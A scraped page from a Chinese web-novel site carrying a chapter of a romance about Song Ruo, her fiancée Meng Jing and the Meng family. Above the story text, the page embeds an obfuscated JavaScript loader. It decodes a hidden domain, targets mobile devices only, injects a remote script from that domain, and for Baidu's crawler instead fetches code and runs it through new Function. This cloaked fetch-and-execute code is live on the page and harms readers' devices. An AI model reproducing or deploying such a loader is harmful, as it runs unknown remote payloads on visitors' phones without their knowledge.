98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(19(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

孟卫国接过来,往后让了一让,对着光觑着眼一瞧,嚯了一声。

手机里边正是宋若下午看过的微博,转发数已增至三万,评论两万。

老爷子静静瞧了两秒,还了手机,看向宋若道是怎么开始的?

宋若还没说话,孟璟把手举了举,笑得甜蜜蜜爷爷,我老婆累了,我跟您说,我为我老婆代言。说着也不管被代言的人同不同意,撮其要删其繁,把前段宋若告诉她的给交代了。

孟卫国听完,再度沉吟,再开口,口吻越发严肃若若,宋兄把你交给我孟家,是为了让你安居乐业,让你有个安稳人生,让你放心做喜欢做的事。有你的成绩,好好念书不成么?怎么就给孟爷爷来了这么一出?

孟璟看向宋若。未婚妻还没说话,祖父又道你年纪还小,可能觉得明星光鲜亮丽,走到哪里都像宠儿,但那是面子,里子也是冷暖自知的。你告诉爷爷,去拍戏,是羡慕那样的生活,还是有什么需要用钱的地方,你不好意思说?

这席话,无疑还是为她着想。宋若心中涌起一阵暖意,却也勾起了遥远的惆怅情思。她在超市被星探发现时,对方问她,有个五千块的通告,为期半个月,去不去。那时候关于贫瘠的感触太深刻了,拿着免费甜点靠近的人又多半不怀好意,她当时只是想摆脱那种贫乏感和危机感。等她有了一点积蓄,回去看张院长,院长疼惜她,让她钱够用了就隐退吧,娱乐圈是个大酱缸,并不适合她这样没有背景却美丽的女孩子,铁定要遭罪的。然而,她那时有了个新的目标她想要让抛弃她的人看到她站在最耀眼的地方。

她幻想有朝一日她成为家喻户晓的影后,那曾经抛弃她的人哪怕走在大马路上,只是去乘个车,去喝杯茶,都看到印有她照片的巨幅海报,从而感到哪怕一丝丝后悔。

入行二年,这个夙愿还未得偿,她先出意外死掉了。

然后阴差阳错穿进了一本书里。

即使她在这火了,她原来的目的只怕也达不到了,可那个念头,像是一种前世的执念,哪怕换了个世界,她也无所谓。更何况我喜欢当演员。

孟卫国唔了一声。显然没被这个理由说服。

我支持若若。孟璟揽过未婚妻的肩,难得脸上没有惯常那种似笑非笑的表情,有自己喜欢做的事,是很难得的。爷爷无非是怕若若受欺负嘛,那个圈子复杂,这也考虑得很周到,但这不是有我呢嘛!说完朝未婚妻眨了个眼。

宋若立刻掉转头不看她。

孟璟继续强调爷爷放心,有我呢。您多休息,别费神了。

谢琼的房间在楼上,和孟璟、宋若的房间呈品字。她洗完澡出来,站在走廊上俯瞰下方。

大厅里,孟璟和宋若还在陪着祖父下旗,不时传来老人的一两声笑,先前的紧张气氛不复存在。她静静站着,身边什么时候来了人也不知道。

直至来人开口说话,她才发现。那人是她母亲。母亲淡淡问她喜欢吗?

谢琼没做声。

喜欢就抢过来。母亲手里端着酒杯,脸上已是微醺的坨红,说话的声音像丝线缠绕耳际,细细的,但是逃不脱,儿子女儿有什么不一样。这偌大家业,合着都给你表妹一个人,我就只配为他人做嫁衣?我哥生前就凡事压我一头。他走了,他女儿还抢你的东西。这丫头你喜欢,就大胆追去,妈支持你。结了婚还可以离呢,个破婚约有什么了不起。你外公想报恩,那你把这小丫头抢过来,他多给你们两妇妇分些产业,不就了了。

谢琼轻轻看她一眼,你醉了。

没醉。孟姗姗失笑,看女儿转身进了房间,便斜倚在栏杆上,轻轻地摇晃着手中的酒杯,右半边脸沉浸在阴影里。

宋若本想找孟璟谈谈,关于今天傍晚她的所作所为,关于最近她的种种反常、越界以及假戏真做、入戏太深等等行为,算是一个比较深刻的交流。可下完棋之后,孟璟去哄孟爷爷睡觉,她在客厅等了好一会儿也不见她回来,起身去孟爷爷的房门外,听一听动静。

谁知,孟璟正在那里唱歌呢。

唱的是《两只老虎》,这一首唱完之后,又来了一首《三只小熊》。

宋若双手交叠放在身后,悄悄倚靠在门口,听住了。

芬姨拿着两床被单从南面儿的阳台来,见了她,讶异问若若,怎么站这儿?这么高兴?

宋若嘘了一声,指指房门里边,抿嘴而笑。

难怪刚刚抹香鲸嘱咐她早点上楼,嘱咐了好几次。

芬姨也侧耳听了会儿,也笑她小时候我给她唱的,她都学会了,她这把嗓子像她妈,没得说。

宋若点点头,和她道了晚安,先行上楼。去洗澡之前,她想了一想,把抹香鲸从微信黑名单里放出来。用微信聊也好,省得见面。

浴缸旁边也不知是谁,放了半杯红酒在那里。

从浴室出来,迎面见了个人。谢琼穿着身藏青色的吊带裙。

宋若奇道还没睡?她明明个多小时前就说困了上楼休息。

谢琼微微笑了笑,明天有空吗?

原主和这个人羁绊甚深,宋若却有自信可以规避,她以歉然的口吻说我明天上午去学校拿通知,下午回剧组。

也就是全天都没空。

哪知谢琼仍然不放弃中午?

大意了。宋若挽了挽耳朵跟前的一缕散发,有什么事吗?

谢琼松口气的样子,你数学比我好,我堂弟,想买几本参考资料,我想麻烦你,帮忙参详参详。

宋若想了想,成。

也许是她鲜少失眠,头天晚上偶一为之,下午靠着抹香鲸睡了半天不说,到了晚上也是挨枕头就着。黑甜一觉,醒来已经七点多。

手机里赫然有孟璟的微信消息。

分别在晚上十一点四十分和零点各撤回一条。

然后是凌晨一点的。

孟璟璟璟璟向您转账100元

孟璟璟璟璟明早一起领通知书呗

孟璟璟璟璟晚安哦我的大明星老婆

宋若坐在床上石化了半分钟,扶着额头,很有种立刻把这臭鲸鱼拉回黑名单的冲动。

她下楼时,不见孟璟。倒是老爷子和孟姗姗父女二人正聊着。

孟姗姗拿小银匙搅着杯子里的咖啡,妆容精致的脸上一抹浅笑爸,我托付个人给您,您帮我照看一阵。

第25章 戏过了

通知书这种东西,孟璟历来就没有关心过,分数乃浮云,她为人比较实在,不在乎那些虚头巴脑的东西。今年宋毅在班群一吼让拿通知书,她却莫名感到一阵兴奋。凌晨就约了未婚妻,次日一起去学校。

未婚妻今早情绪比较奇怪,说不高兴倒也不是,但是那一种安静,和她平时的沉默是不太一样的。孟璟自问不如大多数女生心思细腻,但大致的好歹总还分得清。她穿着一身浅灰的运动衫,两手插在裤袋里,不去打搅小药瓶子做深入思考。沿途偶尔遇到校友,都对她俩行注目礼,比以往更甚。

硬憋着不说话,嘴巴寂寞,孟璟叼了个橘子味棒棒糖,时不时往未婚妻瞅一眼。

暑假的校园里有股清新花香,阳光炽烈,绿植的叶子都翠得仿佛要滴下来。宋毅将两张通知单分别递给她们,推推鼻梁上的眼镜,一如既往的不苟言笑宋若考这个成绩我是有准备的。孟璟啊,说实话,你让我很受伤。

孟璟她急忙翻开成绩单一瞧,哭笑不得不是,您早不受伤,晚不受伤,我这成绩提高了,您反而受伤了?

宋毅微微摇头你能考出这个成绩,说明一件事。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间